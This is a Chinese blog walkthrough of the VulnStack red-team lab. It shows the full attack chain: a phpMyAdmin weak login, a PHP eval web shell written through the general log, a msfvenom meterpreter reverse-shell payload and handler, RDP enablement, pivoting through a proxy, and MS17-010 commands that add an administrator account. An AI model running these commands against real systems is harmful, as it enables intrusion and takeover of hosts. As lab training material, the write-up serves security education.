<!DOCTYPE HTML>
<html lang="zh-CN">


<head>
    <meta charset="utf-8">
    <meta name="keywords" content="VulnStack ATT&amp;CK红队实战一, f14g">
    <meta name="description" content="环境搭建靶机环境是红日团队开源的一个红队实战测试环境，靶机下载地址：http://vulnstack.qiyuanxuetang.net/vuln/detail/2/
通过模拟真实环境搭建的漏洞靶场，完全模拟ATK&amp;amp;CK攻击链路进行">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=no">
    <meta name="renderer" content="webkit|ie-stand|ie-comp">
    <meta name="mobile-web-app-capable" content="yes">
    <meta name="format-detection" content="telephone=no">
    <meta name="apple-mobile-web-app-capable" content="yes">
    <meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">
    <meta name="referrer" content="no-referrer-when-downgrade">
    <!-- Global site tag (gtag.js) - Google Analytics -->


    <title>VulnStack ATT&amp;CK红队实战一 | f14g</title>
    <link rel="icon" type="image/x-icon, image/vnd.microsoft.icon" href="/favicon.ico">
    


    <!-- bg-cover style     -->



<link rel="stylesheet" type="text/css" href="/libs/awesome/css/all.min.css">
<link rel="stylesheet" type="text/css" href="/libs/materialize/materialize.min.css">
<link rel="stylesheet" type="text/css" href="/libs/aos/aos.css">
<link rel="stylesheet" type="text/css" href="/libs/animate/animate.min.css">
<link rel="stylesheet" type="text/css" href="/libs/lightGallery/css/lightgallery.min.css">
<link rel="stylesheet" type="text/css" href="/css/matery.css">
<link rel="stylesheet" type="text/css" href="/css/my.css">
<link rel="stylesheet" type="text/css" href="/css/dark.css" media="none" onload="if(media!='all')media='all'">




    <link rel="stylesheet" href="/libs/tocbot/tocbot.css">
    <link rel="stylesheet" href="/css/post.css">




    
        <link rel="stylesheet" type="text/css" href="/css/reward.css">
    



    <script src="/libs/jquery/jquery-3.6.0.min.js"></script>

<meta name="generator" content="Hexo 6.3.0"></head>


<body>
    <header class="navbar-fixed">
    <nav id="headNav" class="bg-color nav-transparent">
        <div id="navContainer" class="nav-wrapper container">
            <div class="brand-logo">
                <a href="/" class="waves-effect waves-light">
                    
                    <img src="/medias/logo.png" class="logo-img" alt="LOGO">
                    
                    <span class="logo-span">f14g</span>
                </a>
            </div>
            

<a href="#" data-target="mobile-nav" class="sidenav-trigger button-collapse"><i class="fas fa-bars"></i></a>
<ul class="right nav-menu">
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/" class="waves-effect waves-light">
      
      <i class="fas fa-home" style="zoom: 0.6;"></i>
      
      <span>首页</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/tags" class="waves-effect waves-light">
      
      <i class="fas fa-tags" style="zoom: 0.6;"></i>
      
      <span>标签</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/categories" class="waves-effect waves-light">
      
      <i class="fas fa-bookmark" style="zoom: 0.6;"></i>
      
      <span>分类</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/archives" class="waves-effect waves-light">
      
      <i class="fas fa-archive" style="zoom: 0.6;"></i>
      
      <span>归档</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/about" class="waves-effect waves-light">
      
      <i class="fas fa-user-circle" style="zoom: 0.6;"></i>
      
      <span>关于</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/contact" class="waves-effect waves-light">
      
      <i class="fas fa-comments" style="zoom: 0.6;"></i>
      
      <span>留言板</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/friends" class="waves-effect waves-light">
      
      <i class="fas fa-address-book" style="zoom: 0.6;"></i>
      
      <span>友情链接</span>
    </a>
    
  </li>
  
  <li>
    <a href="#searchModal" class="modal-trigger waves-effect waves-light">
      <i id="searchIcon" class="fas fa-search" title="搜索" style="zoom: 0.85;"></i>
    </a>
  </li>
  <li>
    <a href="javascript:;" class="waves-effect waves-light" onclick="switchNightMode()" title="深色/浅色模式" >
      <i id="sum-moon-icon" class="fas fa-sun" style="zoom: 0.85;"></i>
    </a>
  </li>
</ul>


<div id="mobile-nav" class="side-nav sidenav">

    <div class="mobile-head bg-color">
        
        <img src="/medias/logo.png" class="logo-img circle responsive-img">
        
        <div class="logo-name">f14g</div>
        <div class="logo-desc">
            
            Never really desperate, only the lost of the soul.
            
        </div>
    </div>

    <ul class="menu-list mobile-menu-list">
        
        <li class="m-nav-item">
	  
		<a href="/" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-home"></i>
			
			首页
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/tags" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-tags"></i>
			
			标签
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/categories" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-bookmark"></i>
			
			分类
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/archives" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-archive"></i>
			
			归档
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/about" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-user-circle"></i>
			
			关于
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/contact" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-comments"></i>
			
			留言板
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/friends" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-address-book"></i>
			
			友情链接
		</a>
          
        </li>
        
        
    </ul>
</div>


        </div>

        
    </nav>

</header>

    



<div class="bg-cover pd-header post-cover" style="background-image: url('/images/63.jpg')">
    <div class="container" style="right: 0px;left: 0px;">
        <div class="row">
            <div class="col s12 m12 l12">
                <div class="brand">
                    <h1 class="description center-align post-title">VulnStack ATT&amp;CK红队实战一</h1>
                </div>
            </div>
        </div>
    </div>
</div>




<main class="post-container content">

    
    <div class="row">
    <div id="main-content" class="col s12 m12 l9">
        <!-- 文章内容详情 -->
<div id="artDetail">
    <div class="card">
        <div class="card-content article-info">
            <div class="row tag-cate">
                <div class="col s7">
                    
                    <div class="article-tag">
                        
                            <a href="/tags/VulnStack-ATT-CK%E7%BA%A2%E9%98%9F%E5%AE%9E%E6%88%98/">
                                <span class="chip bg-color">VulnStack ATT&amp;CK红队实战</span>
                            </a>
                        
                    </div>
                    
                </div>
                <div class="col s5 right-align">
                    
                    <div class="post-cate">
                        <i class="fas fa-bookmark fa-fw icon-category"></i>
                        
                            <a href="/categories/ATT-CK%E7%BA%A2%E9%98%9F%E5%AE%9E%E6%88%98/" class="post-category">
                                ATT&CK红队实战
                            </a>
                        
                    </div>
                    
                </div>
            </div>

            <div class="post-info">
                
                <div class="post-date info-break-policy">
                    <i class="far fa-calendar-minus fa-fw"></i>发布日期:&nbsp;&nbsp;
                    2023-08-01
                </div>
                

                
                <div class="post-date info-break-policy">
                    <i class="far fa-calendar-check fa-fw"></i>更新日期:&nbsp;&nbsp;
                    2023-08-01
                </div>
                

                
                <div class="info-break-policy">
                    <i class="far fa-file-word fa-fw"></i>文章字数:&nbsp;&nbsp;
                    1.5k
                </div>
                

                
                <div class="info-break-policy">
                    <i class="far fa-clock fa-fw"></i>阅读时长:&nbsp;&nbsp;
                    6 分
                </div>
                

                
                    <div id="busuanzi_container_page_pv" class="info-break-policy">
                        <i class="far fa-eye fa-fw"></i>阅读次数:&nbsp;&nbsp;
                        <span id="busuanzi_value_page_pv"></span>
                    </div>
				
            </div>
        </div>
        <hr class="clearfix">

        
        <!-- 是否加载使用自带的 prismjs. -->
        <link rel="stylesheet" href="/libs/prism/prism.min.css">
        

        

        <div class="card-content article-card-content">
            <div id="articleContent">
                <h2 id="环境搭建"><a href="#环境搭建" class="headerlink" title="环境搭建"></a>环境搭建</h2><p>靶机环境是红日团队开源的一个红队实战测试环境，靶机下载地址：<a target="_blank" rel="noopener" href="http://vulnstack.qiyuanxuetang.net/vuln/detail/2/">http://vulnstack.qiyuanxuetang.net/vuln/detail/2/</a></p>
<p>通过模拟真实环境搭建的漏洞靶场，完全模拟ATK&amp;CK攻击链路进行搭建，形成完整个闭环。虚拟机默认密码为hongrisec@2019。但是2003和2008我在配置的时候是需要改密码的，如果配置过程中出现提示要改密码，改一下就可以了。</p>
<p>然后给三台机器配置网卡,192.168.52.0网段模拟内网，192.168.1.0网段模拟外网</p>
<p>win7:</p>
<pre class="line-numbers language-none"><code class="language-none">外网网卡IP（桥接）：192.168.1.138
内网网卡IP（仅主机）：192.168.52.143<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span></span></code></pre>

<p>域控win2008</p>
<pre class="line-numbers language-none"><code class="language-none">192.168.52.138<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p>域成员win2k3</p>
<pre class="line-numbers language-none"><code class="language-none">192.168.52.141<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p>攻击机kali</p>
<p><img src="/2023/08/01/VulnStack-ATT-CK%E7%BA%A2%E9%98%9F%E5%AE%9E%E6%88%98%E4%B8%80/image-20230801170313359.png" alt="image-20230801170313359"></p>
<h2 id="信息收集"><a href="#信息收集" class="headerlink" title="信息收集"></a>信息收集</h2><h3 id="端口探测"><a href="#端口探测" class="headerlink" title="端口探测"></a>端口探测</h3><p>我们拿到公网web服务器IP之后，首先就行就是信息收集</p>
<p>首先要把win开启web服务，在win7中开启phpstudy(在c盘中)</p>
<p>然后就是扫描端口开放情况了</p>
<pre class="line-numbers language-bash" data-language="bash"><code class="language-bash">nmap <span class="token parameter variable">-T4</span> <span class="token number">192.168</span>.1.138<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p><img src="/2023/08/01/VulnStack-ATT-CK%E7%BA%A2%E9%98%9F%E5%AE%9E%E6%88%98%E4%B8%80/image-20230801090802763.png" alt="image-20230801090802763"></p>
<h3 id="目录扫描"><a href="#目录扫描" class="headerlink" title="目录扫描"></a>目录扫描</h3><p>对网站根目录扫一下</p>
<pre class="line-numbers language-bash" data-language="bash"><code class="language-bash">python dirsearch.py <span class="token parameter variable">-u</span> <span class="token number">192.168</span>.1.138<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p><img src="/2023/08/01/VulnStack-ATT-CK%E7%BA%A2%E9%98%9F%E5%AE%9E%E6%88%98%E4%B8%80/image-20230727151715191.png" alt="image-20230727151715191"></p>
<h2 id="攻击target-win7"><a href="#攻击target-win7" class="headerlink" title="攻击target_win7"></a>攻击target_win7</h2><h3 id="getshell"><a href="#getshell" class="headerlink" title="getshell"></a>getshell</h3><p>经过信息收集发现80端口开放</p>
<p>直接访问80端口</p>
<p><img src="/2023/08/01/VulnStack-ATT-CK%E7%BA%A2%E9%98%9F%E5%AE%9E%E6%88%98%E4%B8%80/image-20230801090837428.png" alt="image-20230801090837428"></p>
<p>然后访问&#x2F;phpMyadmin</p>
<p>弱口令root&#x2F;root成功登录</p>
<pre class="line-numbers language-none"><code class="language-none">phpmyadmin后台getshell的常用手段有以下几种方式：

1、select into outfile直接写入
2、开启全局日志getshell 
3、使用慢查询日志getsehll
4、使用错误日志getshell
5、利用phpmyadmin4.8.x本地文件包含漏洞getshell<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<p>执行</p>
<pre class="line-numbers language-sql" data-language="sql"><code class="language-sql"><span class="token keyword">show</span> variables <span class="token operator">like</span> <span class="token string">'%secure%'</span><span class="token punctuation">;</span><span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p><img src="/2023/08/01/VulnStack-ATT-CK%E7%BA%A2%E9%98%9F%E5%AE%9E%E6%88%98%E4%B8%80/image-20230727152626790.png" alt="image-20230727152626790"></p>
<p>方法一不能用了</p>
<p>尝试方法二</p>
<p>执行</p>
<pre class="line-numbers language-sql" data-language="sql"><code class="language-sql"><span class="token keyword">show</span> variables <span class="token operator">like</span> <span class="token string">'%general%'</span><span class="token punctuation">;</span><span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p><img src="/2023/08/01/VulnStack-ATT-CK%E7%BA%A2%E9%98%9F%E5%AE%9E%E6%88%98%E4%B8%80/image-20230727153727320.png" alt="image-20230727153727320"></p>
<pre class="line-numbers language-sql" data-language="sql"><code class="language-sql"><span class="token keyword">set</span> <span class="token keyword">global</span> general_log<span class="token operator">=</span><span class="token keyword">on</span><span class="token punctuation">;</span><span class="token comment"># 开启日志</span>
<span class="token keyword">set</span> <span class="token keyword">global</span> general_log_file<span class="token operator">=</span><span class="token string">'C:/phpStudy/WWW/shell.php'</span><span class="token punctuation">;</span> <span class="token comment"># 设置日志位置为网站目录</span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span></span></code></pre>

<p>发现ok了</p>
<p>然后就可以写马上传了</p>
<pre class="line-numbers language-php" data-language="php"><code class="language-php">select "<span class="token php language-php"><span class="token delimiter important">&lt;?php</span> @<span class="token keyword">eval</span><span class="token punctuation">(</span><span class="token variable">$_POST</span><span class="token punctuation">[</span><span class="token string single-quoted-string">'f14g'</span><span class="token punctuation">]</span><span class="token punctuation">)</span><span class="token punctuation">;</span><span class="token delimiter important">?></span></span>";<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p>成功写入</p>
<p><img src="/2023/08/01/VulnStack-ATT-CK%E7%BA%A2%E9%98%9F%E5%AE%9E%E6%88%98%E4%B8%80/image-20230727155730651.png" alt="image-20230727155730651"></p>
<p>蚁剑连接</p>
<p><img src="/2023/08/01/VulnStack-ATT-CK%E7%BA%A2%E9%98%9F%E5%AE%9E%E6%88%98%E4%B8%80/image-20230801091044224.png" alt="image-20230801091044224"></p>
<p>打开终端</p>
<p><img src="/2023/08/01/VulnStack-ATT-CK%E7%BA%A2%E9%98%9F%E5%AE%9E%E6%88%98%E4%B8%80/image-20230801091137018.png" alt="image-20230801091137018"></p>
<p>成功getshell,而且正好是管理员的shell,我们也不需要进行提权了</p>
<p>getshell的方法还有很多种，我这里就只用mysql 开启全局日志getshell </p>
<p>可以参考</p>
<p><a target="_blank" rel="noopener" href="https://blog.csdn.net/weixin_45605352/article/details/119740990?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522164033306816780261969442%2522%252C%2522scm%2522%253A%252220140713.130102334.pc%255Fall.%2522%257D&request_id=164033306816780261969442&biz_id=0&utm_medium=distribute.pc_search_result.none-task-blog-2~all~first_rank_ecpm_v1~rank_v31_ecpm-1-119740990.first_rank_v2_pc_rank_v29&utm_term=%E7%BA%A2%E6%97%A5%E5%AE%89%E5%85%A8vulnstack-ATT&CK%E5%AE%9E%E6%88%98%E7%B3%BB%E5%88%97%20%E7%BA%A2%E9%98%9F%E5%AE%9E%E6%88%98%EF%BC%88%E4%B8%80%EF%BC%89&spm=1018.2226.3001.4187">https://blog.csdn.net/weixin_45605352/article/details/119740990?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522164033306816780261969442%2522%252C%2522scm%2522%253A%252220140713.130102334.pc%255Fall.%2522%257D&amp;request_id=164033306816780261969442&amp;biz_id=0&amp;utm_medium=distribute.pc_search_result.none-task-blog-2~all~first_rank_ecpm_v1~rank_v31_ecpm-1-119740990.first_rank_v2_pc_rank_v29&amp;utm_term=%E7%BA%A2%E6%97%A5%E5%AE%89%E5%85%A8vulnstack-ATT&amp;CK%E5%AE%9E%E6%88%98%E7%B3%BB%E5%88%97%20%E7%BA%A2%E9%98%9F%E5%AE%9E%E6%88%98%EF%BC%88%E4%B8%80%EF%BC%89&amp;spm=1018.2226.3001.4187</a></p>
<h3 id="获取主机权限"><a href="#获取主机权限" class="headerlink" title="获取主机权限"></a>获取主机权限</h3><p>生成木马</p>
<pre class="line-numbers language-bash" data-language="bash"><code class="language-bash">msfvenom <span class="token parameter variable">-p</span> windows/x64/meterpreter/reverse_tcp <span class="token assign-left variable">lhost</span><span class="token operator">=</span><span class="token number">192.168</span>.1.129 <span class="token assign-left variable">lport</span><span class="token operator">=</span><span class="token number">5555</span> <span class="token parameter variable">-f</span> exe <span class="token operator">></span> shell1.exe<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p><img src="/2023/08/01/VulnStack-ATT-CK%E7%BA%A2%E9%98%9F%E5%AE%9E%E6%88%98%E4%B8%80/image-20230728102717179.png" alt="image-20230728102717179"></p>
<p>把生成的木马上传到蚁剑中，并让他执行</p>
<p><img src="/2023/08/01/VulnStack-ATT-CK%E7%BA%A2%E9%98%9F%E5%AE%9E%E6%88%98%E4%B8%80/image-20230728102801549.png" alt="image-20230728102801549"></p>
<p><img src="/2023/08/01/VulnStack-ATT-CK%E7%BA%A2%E9%98%9F%E5%AE%9E%E6%88%98%E4%B8%80/image-20230728102827353.png" alt="image-20230728102827353"></p>
<p>在kali上设置监听</p>
<pre class="line-numbers language-bash" data-language="bash"><code class="language-bash">use /exploit/multi/handler
<span class="token builtin class-name">set</span> payload windows/x64/meterpreter/reverse_tcp
<span class="token builtin class-name">set</span> lhost <span class="token number">192.168</span>.1.129
<span class="token builtin class-name">set</span> lport <span class="token number">5555</span>
run<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<p><img src="/2023/08/01/VulnStack-ATT-CK%E7%BA%A2%E9%98%9F%E5%AE%9E%E6%88%98%E4%B8%80/image-20230728103035978.png" alt="image-20230728103035978"></p>
<h2 id="打入内网"><a href="#打入内网" class="headerlink" title="打入内网"></a>打入内网</h2><h3 id="内网信息收集"><a href="#内网信息收集" class="headerlink" title="内网信息收集"></a>内网信息收集</h3><h4 id="Windows信息收集"><a href="#Windows信息收集" class="headerlink" title="Windows信息收集"></a>Windows信息收集</h4><p>由于getshell的服务器是Windows操作系统，Windows操作系统常用信息收集命令如下</p>
<pre class="line-numbers language-none"><code class="language-none">ipconfig &#x2F;all   # 查看本机ip，所在域
 route print     # 打印路由信息
 net view        # 查看局域网内其他主机名
 arp -a          # 查看arp缓存
 net start       # 查看开启了哪些服务
 net share       # 查看开启了哪些共享
 net share ipc$  # 开启ipc共享
 net share c$    # 开启c盘共享
 net use \\192.168.xx.xx\ipc$ &quot;&quot; &#x2F;user:&quot;&quot;    # 与192.168.xx.xx建立空连接
 net use \\192.168.xx.xx\c$ &quot;密码&quot; &#x2F;user:&quot;用户名&quot;    # 建立c盘共享
 dir \\192.168.xx.xx\c$\user    # 查看192.168.xx.xx c盘user目录下的文件
 
 net config Workstation    # 查看计算机名、全名、用户名、系统版本、工作站、域、登录域
 net user                 # 查看本机用户列表
 net user &#x2F;domain         # 查看域用户
 net localgroup administrators    # 查看本地管理员组（通常会有域用户）
 net view &#x2F;domain         # 查看有几个域
 net user 用户名 &#x2F;domain   # 获取指定域用户的信息
 net group &#x2F;domain        # 查看域里面的工作组，查看把用户分了多少组（只能在域控上操作）
 net group 组名 &#x2F;domain    # 查看域中某工作组
 net group &quot;domain admins&quot; &#x2F;domain  # 查看域管理员的名字
 net group &quot;domain computers&quot; &#x2F;domain  # 查看域中的其他主机名
 net group &quot;doamin controllers&quot; &#x2F;domain  # 查看域控制器（可能有多台）<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<p>使用</p>
<pre class="line-numbers language-none"><code class="language-none">ipconfig &#x2F;all<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p>发现内网网段</p>
<p><img src="/2023/08/01/VulnStack-ATT-CK%E7%BA%A2%E9%98%9F%E5%AE%9E%E6%88%98%E4%B8%80/image-20230727160917490.png" alt="image-20230727160917490"></p>
<p>查看域信息：net config workstation</p>
<p><img src="/2023/08/01/VulnStack-ATT-CK%E7%BA%A2%E9%98%9F%E5%AE%9E%E6%88%98%E4%B8%80/image-20230727161259164.png" alt="image-20230727161259164"></p>
<p>查看域内所有用户列表：net user &#x2F;domain</p>
<p><img src="/2023/08/01/VulnStack-ATT-CK%E7%BA%A2%E9%98%9F%E5%AE%9E%E6%88%98%E4%B8%80/image-20230727161657270.png" alt="image-20230727161657270"></p>
<p>查看域成员计算机列表：net group “domain computers” &#x2F;domain</p>
<p><img src="/2023/08/01/VulnStack-ATT-CK%E7%BA%A2%E9%98%9F%E5%AE%9E%E6%88%98%E4%B8%80/image-20230727162229878.png" alt="image-20230727162229878"></p>
<p>查看域管理员用户：net group “domain admins” &#x2F;domain</p>
<p><img src="/2023/08/01/VulnStack-ATT-CK%E7%BA%A2%E9%98%9F%E5%AE%9E%E6%88%98%E4%B8%80/image-20230727162314852.png" alt="image-20230727162314852"></p>
<p>域控制用户为 OWA</p>
<p>执行<code>run post/windows/manage/enable_rdp</code>模块来关闭防火墙，并使用rdesktop打开远程桌面</p>
<p><img src="/2023/08/01/VulnStack-ATT-CK%E7%BA%A2%E9%98%9F%E5%AE%9E%E6%88%98%E4%B8%80/image-20230801093319107.png" alt="image-20230801093319107"></p>
<p><img src="/2023/08/01/VulnStack-ATT-CK%E7%BA%A2%E9%98%9F%E5%AE%9E%E6%88%98%E4%B8%80/image-20230801093446388.png" alt="image-20230801093446388"></p>
<h4 id="主机探测"><a href="#主机探测" class="headerlink" title="主机探测"></a>主机探测</h4><p>探测52网段存在的主机</p>
<pre class="line-numbers language-none"><code class="language-none">for &#x2F;L %I in (1,1,254) DO @ping -w 1 -n 1 192.168.52.%I | findstr &quot;TTL&#x3D;&quot; <span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p><img src="/2023/08/01/VulnStack-ATT-CK%E7%BA%A2%E9%98%9F%E5%AE%9E%E6%88%98%E4%B8%80/image-20230801094544624.png" alt="image-20230801094544624"></p>
<h4 id="路由转发"><a href="#路由转发" class="headerlink" title="路由转发"></a>路由转发</h4><pre class="line-numbers language-none"><code class="language-none">run autoroute -s 192.168.52.0&#x2F;24
run autoroute -p<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span></span></code></pre>

<p><img src="/2023/08/01/VulnStack-ATT-CK%E7%BA%A2%E9%98%9F%E5%AE%9E%E6%88%98%E4%B8%80/image-20230801102536180.png" alt="image-20230801102536180"></p>
<h4 id="配置代理"><a href="#配置代理" class="headerlink" title="配置代理"></a>配置代理</h4><pre class="line-numbers language-bash" data-language="bash"><code class="language-bash">use auxiliary/server/socks_proxy
<span class="token builtin class-name">set</span> srvhosts <span class="token number">192.168</span>.1.129
<span class="token builtin class-name">set</span> srvport <span class="token number">1080</span>
<span class="token builtin class-name">set</span> version 4a
run<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<p>然后在修改proxychains配置文件的最后一行</p>
<pre class="line-numbers language-bash" data-language="bash"><code class="language-bash">sokcs4 <span class="token number">192.168</span>.1.129 <span class="token number">1080</span><span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<h4 id="端口探测-1"><a href="#端口探测-1" class="headerlink" title="端口探测"></a>端口探测</h4><pre class="line-numbers language-bash" data-language="bash"><code class="language-bash">proxychains nmap <span class="token parameter variable">-T4</span> <span class="token number">192.168</span>.52.141<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p><img src="/2023/08/01/VulnStack-ATT-CK%E7%BA%A2%E9%98%9F%E5%AE%9E%E6%88%98%E4%B8%80/image-20230801164703712.png" alt="image-20230801164703712"></p>
<h3 id="获取主机权限-1"><a href="#获取主机权限-1" class="headerlink" title="获取主机权限"></a>获取主机权限</h3><p>扫描是否存在ms17_010</p>
<pre class="line-numbers language-none"><code class="language-none">use scanner&#x2F;smb&#x2F;smb_ms17_010
set rhost 192.168.52.141
run<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span></span></code></pre>

<p><img src="/2023/08/01/VulnStack-ATT-CK%E7%BA%A2%E9%98%9F%E5%AE%9E%E6%88%98%E4%B8%80/image-20230801103543635.png" alt="image-20230801103543635"></p>
<p>尝试进行攻击</p>
<p>经过尝试msf自带的ms17_010脚本不可以很好的攻击</p>
<pre class="line-numbers language-bash" data-language="bash"><code class="language-bash">use exploit/windows/smb/ms17_010_psexec<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p>但是这个模块可以执行命令</p>
<pre class="line-numbers language-bash" data-language="bash"><code class="language-bash">use auxiliary/admin/smb/ms17_010_command
<span class="token builtin class-name">set</span> rhosts <span class="token number">192.168</span>.52.141
<span class="token builtin class-name">set</span> <span class="token builtin class-name">command</span> <span class="token function">whoami</span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span></span></code></pre>

<p>通过ms17_010_command开启3389端口</p>
<pre class="line-numbers language-bash" data-language="bash"><code class="language-bash"><span class="token builtin class-name">set</span> <span class="token builtin class-name">command</span> <span class="token string">'REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f'</span><span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p>在这里，我用的是先添加一个用户，然后使用 exploit&#x2F;windows&#x2F;smb&#x2F;ms17_010_psexec 尝试去打一个shell回来，因为这个模块需要你去指定一个管理员用户。</p>
<p>先用<code>auxiliary/admin/smb/ms17_010_command</code>来添加一个用户</p>
<pre class="line-numbers language-bash" data-language="bash"><code class="language-bash">use auxiliary/admin/smb/ms17_010_command
<span class="token builtin class-name">set</span> <span class="token builtin class-name">command</span> net user f14g qaz@123QWE /add
run
<span class="token builtin class-name">set</span> <span class="token builtin class-name">command</span> net localgroup administrators f14g /add 
run<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<p>然后就可以远程登录win2k3了</p>
<p>接下来win2008和这台win2k3的方法一样</p>

                
            </div>
            <hr/>

            

    <div class="reprint" id="reprint-statement">
        
            <div class="reprint__author">
                <span class="reprint-meta" style="font-weight: bold;">
                    <i class="fas fa-user">
                        文章作者:
                    </i>
                </span>
                <span class="reprint-info">
                    <a href="/about" rel="external nofollow noreferrer">f14g</a>
                </span>
            </div>
            <div class="reprint__type">
                <span class="reprint-meta" style="font-weight: bold;">
                    <i class="fas fa-link">
                        文章链接:
                    </i>
                </span>
                <span class="reprint-info">
                    <a href="http://example.com/2023/08/01/VulnStack-ATT-CK%E7%BA%A2%E9%98%9F%E5%AE%9E%E6%88%98%E4%B8%80/">http://example.com/2023/08/01/VulnStack-ATT-CK%E7%BA%A2%E9%98%9F%E5%AE%9E%E6%88%98%E4%B8%80/</a>
                </span>
            </div>
            <div class="reprint__notice">
                <span class="reprint-meta" style="font-weight: bold;">
                    <i class="fas fa-copyright">
                        版权声明:
                    </i>
                </span>
                <span class="reprint-info">
                    本博客所有文章除特別声明外，均采用
                    <a href="https://creativecommons.org/licenses/by/4.0/deed.zh" rel="external nofollow noreferrer" target="_blank">CC BY 4.0</a>
                    许可协议。转载请注明来源
                    <a href="/about" target="_blank">f14g</a>
                    !
                </span>
            </div>
        
    </div>

    <script async defer>
      document.addEventListener("copy", function (e) {
        let toastHTML = '<span>复制成功，请遵循本文的转载规则</span><button class="btn-flat toast-action" onclick="navToReprintStatement()" style="font-size: smaller">查看</a>';
        M.toast({html: toastHTML})
      });

      function navToReprintStatement() {
        $("html, body").animate({scrollTop: $("#reprint-statement").offset().top - 80}, 800);
      }
    </script>



            <div class="tag_share" style="display: block;">
                <div class="post-meta__tag-list" style="display: inline-block;">
                    
                        <div class="article-tag">
                            
                                <a href="/tags/VulnStack-ATT-CK%E7%BA%A2%E9%98%9F%E5%AE%9E%E6%88%98/">
                                    <span class="chip bg-color">VulnStack ATT&amp;CK红队实战</span>
                                </a>
                            
                        </div>
                    
                </div>
                <div class="post_share" style="zoom: 80%; width: fit-content; display: inline-block; float: right; margin: -0.15rem 0;">
                    <link rel="stylesheet" type="text/css" href="/libs/share/css/share.min.css">
<div id="article-share">

    
    <div class="social-share" data-sites="twitter,facebook,google,qq,qzone,wechat,weibo,douban,linkedin" data-wechat-qrcode-helper="<p>微信扫一扫即可分享！</p>"></div>
    <script src="/libs/share/js/social-share.min.js"></script>
    

    

</div>

                </div>
            </div>
            
                <div id="reward">
    <a href="#rewardModal" class="reward-link modal-trigger btn-floating btn-medium waves-effect waves-light red">赏</a>

    <!-- Modal Structure -->
    <div id="rewardModal" class="modal">
        <div class="modal-content">
            <a class="close modal-close"><i class="fas fa-times"></i></a>
            <h4 class="reward-title">你的赏识是我前进的动力</h4>
            <div class="reward-content">
                <div class="reward-tabs">
                    <ul class="tabs row">
                        <li class="tab col s6 alipay-tab waves-effect waves-light"><a href="#alipay">支付宝</a></li>
                        <li class="tab col s6 wechat-tab waves-effect waves-light"><a href="#wechat">微 信</a></li>
                    </ul>
                    <div id="alipay">
                        <img src="/medias/reward/alipay.jpg" class="reward-img" alt="支付宝打赏二维码">
                    </div>
                    <div id="wechat">
                        <img src="/medias/reward/wechat.png" class="reward-img" alt="微信打赏二维码">
                    </div>
                </div>
            </div>
        </div>
    </div>
</div>

<script>
    $(function () {
        $('.tabs').tabs();
    });
</script>

            
        </div>
    </div>

    

    

    

    

    

    
        <style>
    .waline-card {
        margin: 1.5rem auto;
    }
    .waline-card .card-content {
        padding: 20px 20px 5px 20px;
    }

    #waline p {
        margin: 2px 2px 10px;
        font-size: 1.05rem;
        line-height: 1.78rem;
    }
    #waline blockquote p {
        text-indent: 0.2rem;
    }
    #waline a {
        padding: 0 2px;
        color: #4cbf30;
        font-weight: 500;
        text-decoration: none;
    }
    #waline img {
        max-width: 100%;
